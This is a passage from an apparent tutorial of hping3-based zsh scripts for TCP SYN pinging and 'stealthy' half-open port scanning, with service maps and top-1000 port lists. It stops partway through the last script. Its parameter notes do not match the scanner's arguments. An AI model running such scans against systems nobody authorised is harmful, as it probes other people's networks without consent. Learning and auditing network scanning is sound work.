echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Extract statistics from output
if grep -q "transmitted" "$TMPFILE" 2>/dev/null; then
    STATS_LINE=$(grep -E "packets transmitted|received|packet loss" "$TMPFILE" | tail -1)
    if [[ -n "$STATS_LINE" ]]; then
        echo -e "${GREEN}          STATISTICS${NC}"
        echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
        
        # Parse transmitted, received, loss
        TRANSMITTED=$(echo "$STATS_LINE" | grep -oE "[0-9]+ packets transmitted" | grep -oE "^[0-9]+")
        RECEIVED=$(echo "$STATS_LINE" | grep -oE "[0-9]+ received" | grep -oE "^[0-9]+")
        LOSS=$(echo "$STATS_LINE" | grep -oE "[0-9]+% packet loss" | grep -oE "^[0-9]+")
        
        if [[ -n "$TRANSMITTED" ]] && [[ -n "$RECEIVED" ]]; then
            echo -e "  ${BLUE}Packets Sent:${NC}     $TRANSMITTED"
            echo -e "  ${BLUE}Replies Received:${NC} $RECEIVED"
            echo -e "  ${BLUE}Packet Loss:${NC}      ${LOSS:-0}%"
            
            # Port status determination
            if [[ "$RECEIVED" -gt 0 ]]; then
                echo -e "  ${BLUE}Port Status:${NC}      ${GREEN}OPEN (Responding)${NC}"
            else
                echo -e "  ${BLUE}Port Status:${NC}      ${RED}CLOSED/FILTERED${NC}"
            fi
        fi
        
        # RTT statistics if available
        if [[ "$SUCCESS_COUNT" -gt 0 ]] && [[ "$TOTAL_RTT" != "0" ]]; then
            AVG_RTT=$(echo "scale=2; $TOTAL_RTT / $SUCCESS_COUNT" | bc)
            echo ""
            echo -e "  ${BLUE}RTT Statistics:${NC}"
            echo -e "    Min: ${MIN_RTT}ms"
            echo -e "    Max: ${MAX_RTT}ms"
            echo -e "    Avg: ${AVG_RTT}ms"
        fi
    fi
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Final status message
echo ""
if [ $EXIT_STATUS -eq 0 ]; then
    if grep -q "flags=SA" "$TMPFILE" 2>/dev/null; then
        echo -e "${GREEN}[✓] TCP port $PORT on $TARGET is OPEN${NC}"
        echo -e "${GREEN}    Service: $SERVICE_NAME${NC}"
    elif grep -q "flags=RA" "$TMPFILE" 2>/dev/null; then
        echo -e "${YELLOW}[!] TCP port $PORT on $TARGET is CLOSED${NC}"
        echo -e "${YELLOW}    The host is reachable but the port is not accepting connections${NC}"
    else
        echo -e "${RED}[✗] TCP port $PORT on $TARGET is FILTERED or host is down${NC}"
        echo -e "${RED}    No response received - possible firewall blocking${NC}"
    fi
else
    echo -e "${RED}[✗] TCP SYN ping failed (exit code: $EXIT_STATUS)${NC}"
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit $EXIT_STATUS
EOF

chmod +x ./tcp_syn_ping.sh

How to Run:

# Test default HTTP port (80)
./tcp_syn_ping.sh google.com

# Test HTTPS port
./tcp_syn_ping.sh google.com 443

# Test SSH port with 5 packets
./tcp_syn_ping.sh ssh.example.com 22 5

# Test with custom interval (0.5 seconds)
./tcp_syn_ping.sh 192.168.1.1 80 10 0.5

# Test database ports
./tcp_syn_ping.sh db.example.com 3306      # MySQL
./tcp_syn_ping.sh db.example.com 5432      # PostgreSQL
./tcp_syn_ping.sh cache.example.com 6379   # Redis

# Get help
./tcp_syn_ping.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to test
– **port** (optional, default: 80): TCP port to send SYN packets to
– **count** (optional, default: 1): Number of SYN packets to send

Response Analysis:
– **SYN+ACK response**: Port is open
– **RST response**: Port is closed
– **No response**: Port is filtered

Script 4: TCP SYN Port Scanner

Purpose:
Performs TCP SYN scanning across a range of ports to identify open services. This is a stealthy scanning technique that doesn’t complete the TCP handshake.

Create the Script:

cat > ./tcp_syn_scan.sh << 'EOF'
#!/bin/zsh

# TCP SYN Port Scanner using hping3
# Performs a TCP SYN scan (half-open scan) on a range of ports
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
START_PORT="${2:-1}"
END_PORT="${3:-1000}"
THREADS="${4:-50}"

# Common service ports
declare -A SERVICE_PORTS=(
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [80]="HTTP"
    [110]="POP3"
    [111]="RPC"
    [135]="MSRPC"
    [139]="NetBIOS"
    [143]="IMAP"
    [443]="HTTPS"
    [445]="SMB"
    [587]="SMTP-TLS"
    [993]="IMAPS"
    [995]="POP3S"
    [1433]="MSSQL"
    [1521]="Oracle"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [5900]="VNC"
    [6379]="Redis"
    [8080]="HTTP-Alt"
    [8443]="HTTPS-Alt"
    [9200]="Elasticsearch"
    [11211]="Memcached"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./tcp_syn_scan.sh"
    echo "Usage: $script_name <target> [start_port] [end_port] [threads]"
    echo "  target     - Hostname or IP address to scan"
    echo "  start_port - Starting port number (default: 1)"
    echo "  end_port   - Ending port number (default: 1000)"
    echo "  threads    - Number of parallel threads (default: 50)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                # Scan ports 1-1000"
    echo "  $script_name 192.168.1.1 1 100         # Scan ports 1-100"
    echo "  $script_name server.local 20 25        # Scan ports 20-25"
    echo "  $script_name example.com 1 65535 100   # Full scan with 100 threads"
    echo ""
    echo "Common Port Ranges:"
    echo "  1-1000      - Common ports (default)"
    echo "  1-65535     - All ports"
    echo "  20-445      - Common services"
    echo "  1024-5000   - User ports"
    echo "  49152-65535 - Dynamic/private ports"
}

# Function to validate port range
validate_ports() {
    local start=$1
    local end=$2
    
    if ! [[ "$start" =~ ^[0-9]+$ ]] || ! [[ "$end" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Port numbers must be integers${NC}"
        return 1
    fi
    
    if [ "$start" -lt 1 ] || [ "$start" -gt 65535 ] || [ "$end" -lt 1 ] || [ "$end" -gt 65535 ]; then
        echo -e "${RED}Error: Port numbers must be between 1-65535${NC}"
        return 1
    fi
    
    if [ "$start" -gt "$end" ]; then
        echo -e "${RED}Error: Start port must be less than or equal to end port${NC}"
        return 1
    fi
    
    return 0
}

# Function to get service name
get_service() {
    local port=$1
    if [[ -n "${SERVICE_PORTS[$port]}" ]]; then
        echo "${SERVICE_PORTS[$port]}"
    else
        # Try to get from system services file
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "unknown"
        fi
    fi
}

# Function to scan a single port
scan_port() {
    local target=$1
    local port=$2
    local tmpfile=$3
    
    # Run hping3 with timeout
    local result=$(timeout 2 hping3 -S -p "$port" -c 1 "$target" 2>/dev/null)
    
    if echo "$result" | grep -q "flags=SA"; then
        # Port is open (SYN+ACK received)
        local service=$(get_service "$port")
        echo "$port:open:$service" >> "$tmpfile"
        echo -e "${GREEN}[✓] Port $port/tcp open - $service${NC}"
    elif echo "$result" | grep -q "flags=RA"; then
        # Port is closed (RST+ACK received)
        echo "$port:closed" >> "${tmpfile}.closed"
    else
        # Port is filtered or no response
        echo "$port:filtered" >> "${tmpfile}.filtered"
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate port range
if ! validate_ports "$START_PORT" "$END_PORT"; then
    exit 1
fi

# Validate threads
if ! [[ "$THREADS" =~ ^[0-9]+$ ]] || [ "$THREADS" -lt 1 ] || [ "$THREADS" -gt 500 ]; then
    echo -e "${RED}Error: Threads must be between 1-500${NC}"
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check for timeout command
if ! command -v gtimeout &> /dev/null && ! command -v timeout &> /dev/null; then
    echo -e "${YELLOW}Warning: timeout command not found${NC}"
    echo "Install with: brew install coreutils"
    echo "Continuing without timeout protection..."
    echo ""
    
    # Create wrapper function for timeout
    timeout() {
        shift  # Remove the timeout value
        "$@"   # Execute the command directly
    }
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total ports
TOTAL_PORTS=$((END_PORT - START_PORT + 1))

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║        TCP SYN PORT SCANNER            ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}        $TARGET"
echo -e "  ${BLUE}Port Range:${NC}    $START_PORT - $END_PORT"
echo -e "  ${BLUE}Total Ports:${NC}   $TOTAL_PORTS"
echo -e "  ${BLUE}Threads:${NC}       $THREADS"
echo -e "  ${BLUE}Scan Type:${NC}     TCP SYN (Half-open)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Resolve target to IP
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Create temporary files
TMPDIR=$(mktemp -d)
OPEN_PORTS_FILE="$TMPDIR/open_ports"
trap "rm -rf $TMPDIR" EXIT

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting TCP SYN scan...${NC}"
echo -e "${YELLOW}[*] Scanning $TOTAL_PORTS ports with $THREADS parallel threads${NC}"
echo ""

# Progress tracking
SCANNED=0
JOBS_COUNT=0

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d ports)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
for port in $(seq $START_PORT $END_PORT); do
    # Launch scan in background
    scan_port "$TARGET_IP" "$port" "$OPEN_PORTS_FILE" &
    
    # Manage parallel jobs
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$THREADS" ]; do
        sleep 0.05
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_PORTS"
done

# Wait for remaining jobs
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Process results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count results
OPEN_COUNT=0
CLOSED_COUNT=0
FILTERED_COUNT=0

if [ -f "$OPEN_PORTS_FILE" ]; then
    OPEN_COUNT=$(wc -l < "$OPEN_PORTS_FILE" | tr -d ' ')
fi
if [ -f "${OPEN_PORTS_FILE}.closed" ]; then
    CLOSED_COUNT=$(wc -l < "${OPEN_PORTS_FILE}.closed" | tr -d ' ')
fi
if [ -f "${OPEN_PORTS_FILE}.filtered" ]; then
    FILTERED_COUNT=$(wc -l < "${OPEN_PORTS_FILE}.filtered" | tr -d ' ')
fi

# Display open ports
if [ "$OPEN_COUNT" -gt 0 ]; then
    echo -e "${GREEN}[✓] Found $OPEN_COUNT open port(s)${NC}"
    echo ""
    echo -e "${MAGENTA}Open Ports:${NC}"
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    printf "${WHITE}%-10s %-15s %s${NC}\n" "PORT" "STATE" "SERVICE"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Sort and display open ports
    sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port state service; do
        printf "${GREEN}%-10s${NC} ${GREEN}%-15s${NC} ${YELLOW}%s${NC}\n" "$port/tcp" "$state" "$service"
    done
    
    # Save detailed report
    REPORT_FILE="tcp_scan_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "TCP SYN Scan Report"
        echo "==================="
        echo "Target: $TARGET ($TARGET_IP)"
        echo "Port Range: $START_PORT - $END_PORT"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo "Scan Rate: $(( TOTAL_PORTS / (DURATION + 1) )) ports/second"
        echo ""
        echo "Results Summary:"
        echo "----------------"
        echo "Open ports: $OPEN_COUNT"
        echo "Closed ports: $CLOSED_COUNT"
        echo "Filtered ports: $FILTERED_COUNT"
        echo ""
        echo "Open Ports Detail:"
        echo "------------------"
        sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port state service; do
            printf "%-10s %-15s %s\n" "$port/tcp" "$state" "$service"
        done
    } > "$REPORT_FILE"
    
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}[*] Detailed report saved to: $REPORT_FILE${NC}"
else
    echo -e "${YELLOW}[-] No open ports found in the specified range${NC}"
    echo -e "${YELLOW}    Possible reasons:${NC}"
    echo -e "${YELLOW}    • All ports are closed or filtered${NC}"
    echo -e "${YELLOW}    • Firewall is blocking SYN packets${NC}"
    echo -e "${YELLOW}    • Target is down or unreachable${NC}"
fi

# Display statistics
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Ports Scanned:${NC}  $TOTAL_PORTS"
echo -e "  ${GREEN}Open:${NC}           $OPEN_COUNT"
echo -e "  ${RED}Closed:${NC}         $CLOSED_COUNT"
echo -e "  ${YELLOW}Filtered:${NC}       $FILTERED_COUNT"
echo -e "  ${BLUE}Scan Duration:${NC}  ${DURATION} seconds"
echo -e "  ${BLUE}Scan Rate:${NC}      ~$(( TOTAL_PORTS / (DURATION + 1) )) ports/sec"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./tcp_syn_scan.sh

How to Run:

# Scan default ports 1-1000
./tcp_syn_scan.sh example.com

# Scan specific range
./tcp_syn_scan.sh 192.168.1.1 1 100

# Quick scan of common services
./tcp_syn_scan.sh server.local 20 445

# Full port scan with 100 threads
./tcp_syn_scan.sh example.com 1 65535 100

# Scan web ports
./tcp_syn_scan.sh webserver.com 80 443

# Scan database ports
./tcp_syn_scan.sh dbserver.com 3300 3400

# Get help
./tcp_syn_scan.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to scan
– **start_port** (optional, default: 1): First port in the range to scan
– **end_port** (optional, default: 1000): Last port in the range to scan
– **delay** (optional, default: u1000): Delay between packets (u=microseconds)

Script 5: Common Ports Scanner:

Purpose:
Scans a predefined list of commonly used ports with service identification. This is more efficient than scanning large port ranges when looking for standard services.

Create the Script:

brew install coreutils

cat > ./common_ports_scan.sh << 'EOF'
#!/bin/zsh

# Common Ports Scanner using hping3
# Scans commonly used ports with predefined or custom port lists
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
SCAN_TYPE="${2:-default}"
CUSTOM_PORTS="$3"
THREADS="${4:-50}"

# Port categories
declare -A PORT_CATEGORIES=(
    ["default"]="21,22,23,25,53,80,110,143,443,445,3306,3389,5432,8080,8443"
    ["web"]="80,443,8080,8443,8000,8888,3000,5000,9000"
    ["mail"]="25,110,143,465,587,993,995"
    ["database"]="1433,1521,3306,5432,5984,6379,7000,7001,8086,9042,9200,11211,27017"
    ["remote"]="22,23,3389,5900,5901,5902"
    ["file"]="20,21,69,139,445,873,2049"
    ["top100"]="7,9,13,21,22,23,25,26,37,53,79,80,81,88,106,110,111,113,119,135,139,143,144,179,199,389,427,443,444,445,465,513,514,515,543,544,548,554,587,631,646,873,990,993,995,1025,1026,1027,1028,1029,1110,1433,1521,1701,1720,1723,1755,1900,2000,2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000,6001,6379,6646,7000,7070,8000,8008,8009,8080,8081,8443,8888,9100,9200,9999,10000,27017,32768,49152,49153,49154,49155,49156,49157"
    ["top1000"]="1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5922,5925,5950,5952,5959,5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6379,6389,6502,6510,6543,6547,6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,9300,9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11211,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27017,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"
)

# Service mapping
declare -A SERVICE_NAMES=(
    [20]="FTP-Data"
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [67]="DHCP"
    [68]="DHCP"
    [69]="TFTP"
    [80]="HTTP"
    [110]="POP3"
    [123]="NTP"
    [135]="MSRPC"
    [137]="NetBIOS-NS"
    [138]="NetBIOS-DGM"
    [139]="NetBIOS-SSN"
    [143]="IMAP"
    [161]="SNMP"
    [162]="SNMP-Trap"
    [389]="LDAP"
    [443]="HTTPS"
    [445]="SMB"
    [465]="SMTPS"
    [514]="Syslog"
    [515]="LPD"
    [587]="SMTP-TLS"
    [636]="LDAPS"
    [873]="Rsync"
    [993]="IMAPS"
    [995]="POP3S"
    [1433]="MSSQL"
    [1521]="Oracle"
    [1723]="PPTP"
    [2049]="NFS"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [5900]="VNC"
    [5984]="CouchDB"
    [6379]="Redis"
    [7000]="Cassandra"
    [8000]="HTTP-Alt"
    [8080]="HTTP-Proxy"
    [8086]="InfluxDB"
    [8443]="HTTPS-Alt"
    [8888]="HTTP-Alt2"
    [9000]="SonarQube"
    [9042]="Cassandra-CQL"
    [9200]="Elasticsearch"
    [11211]="Memcached"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./common_ports_scan.sh"
    echo "Usage: $script_name <target> [scan_type|custom_ports] [threads]"
    echo ""
    echo "Scan Types:"
    echo "  default    - Top 15 most common ports (default)"
    echo "  web        - Web server ports (80, 443, 8080, etc.)"
    echo "  mail       - Mail server ports (25, 110, 143, etc.)"
    echo "  database   - Database ports (MySQL, PostgreSQL, MongoDB, etc.)"
    echo "  remote     - Remote access ports (SSH, RDP, VNC, etc.)"
    echo "  file       - File sharing ports (FTP, SMB, NFS, etc.)"
    echo "  top100     - Top 100 most common ports"
    echo "  top1000    - Top 1000 most common ports"
    echo "  custom     - Specify custom ports as comma-separated list"
    echo ""
    echo "Parameters:"
    echo "  target     - Hostname or IP address to scan"
    echo "  scan_type  - Type of scan or comma-separated port list"
    echo "  threads    - Number of parallel threads (default: 50)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                    # Scan default ports"
    echo "  $script_name example.com web                # Scan web ports"
    echo "  $script_name example.com database           # Scan database ports"
    echo "  $script_name example.com top100             # Scan top 100 ports"
    echo "  $script_name example.com \"22,80,443,3306\"   # Custom ports"
    echo "  $script_name example.com top1000 100        # Top 1000 with 100 threads"
}

# Function to get service name
get_service_name() {
    local port=$1
    if [[ -n "${SERVICE_NAMES[$port]}" ]]; then
        echo "${SERVICE_NAMES[$port]}"
    else
        # Try to get from system services
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "Unknown"
        fi
    fi
}

# Function to scan a single port
scan_port() {
    local target=$1
    local port=$2
    local tmpfile=$3
    
    # Run hping3 with timeout
    local result=$(timeout 2 hping3 -S -p "$port" -c 1 "$target" 2>/dev/null || true)
    
    if echo "$result" | grep -q "flags=SA"; then
        # Port is open (SYN+ACK received)
        local service=$(get_service_name "$port")
        echo "$port:$service" >> "$tmpfile"
        echo -e "${GREEN}[✓] Port $port/tcp open - $service${NC}"
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Determine ports to scan
if [[ "$SCAN_TYPE" =~ ^[0-9,]+$ ]]; then
    # Custom ports provided
    PORTS_TO_SCAN="$SCAN_TYPE"
    SCAN_DESCRIPTION="Custom ports"
elif [[ -n "${PORT_CATEGORIES[$SCAN_TYPE]}" ]]; then
    # Predefined category
    PORTS_TO_SCAN="${PORT_CATEGORIES[$SCAN_TYPE]}"
    SCAN_DESCRIPTION="$SCAN_TYPE ports"
else
    # Invalid scan type, use default
    PORTS_TO_SCAN="${PORT_CATEGORIES[default]}"
    SCAN_DESCRIPTION="Default common ports"
    if [[ -n "$SCAN_TYPE" ]] && [[ "$SCAN_TYPE" != "default" ]]; then
        echo -e "${YELLOW}Warning: Unknown scan type '$SCAN_TYPE', using default${NC}"
    fi
fi

# Parse threads parameter
if [[ -n "$CUSTOM_PORTS" ]] && [[ "$CUSTOM_PORTS" =~ ^[0-9]+$ ]]; then
    THREADS="$CUSTOM_PORTS"
elif [[ -n "$3" ]] && [[ "$3" =~ ^[0-9]+$ ]]; then
    THREADS="$3"
fi

# Validate threads
if ! [[ "$THREADS" =~ ^[0-9]+$ ]] || [ "$THREADS" -lt 1 ] || [ "$THREADS" -gt 500 ]; then
    THREADS=50
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check for timeout command and create appropriate wrapper
if command -v gtimeout &> /dev/null; then
    # macOS with coreutils installed
    timeout() {
        gtimeout "$@"
    }
elif command -v timeout &> /dev/null; then
    # Linux or other systems with timeout
    timeout() {
        command timeout "$@"
    }
else
    # No timeout command available
    echo -e "${YELLOW}Warning: timeout command not found${NC}"
    echo "Install with: brew install coreutils"
    echo "Continuing without timeout protection..."
    echo ""
    timeout() {
        shift  # Remove timeout value
        "$@"   # Execute command directly
    }
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Convert ports to array (zsh compatible)
